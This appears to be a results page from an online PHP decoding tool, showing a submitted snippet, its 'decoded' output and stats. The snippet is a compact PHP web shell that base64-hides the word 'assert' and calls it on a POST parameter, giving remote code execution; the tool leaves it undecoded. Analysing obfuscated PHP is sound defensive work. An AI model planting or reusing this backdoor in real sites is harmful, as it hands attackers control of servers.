Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $x = base64_decode (YXNzZXJ0); $x($_POST['c']);?..

Decoded Output download

<?php $x = base64_decode (YXNzZXJ0); $x($_POST['c']);? ?>

Did this file decode correctly?

Original Code

<?php $x = base64_decode (YXNzZXJ0); $x($_POST['c']);?

Function Calls

None

Variables

None

Stats

MD5 bdb040ef18e7ebd246e27330a0893e5c
Eval Count 0
Decode Time 49 ms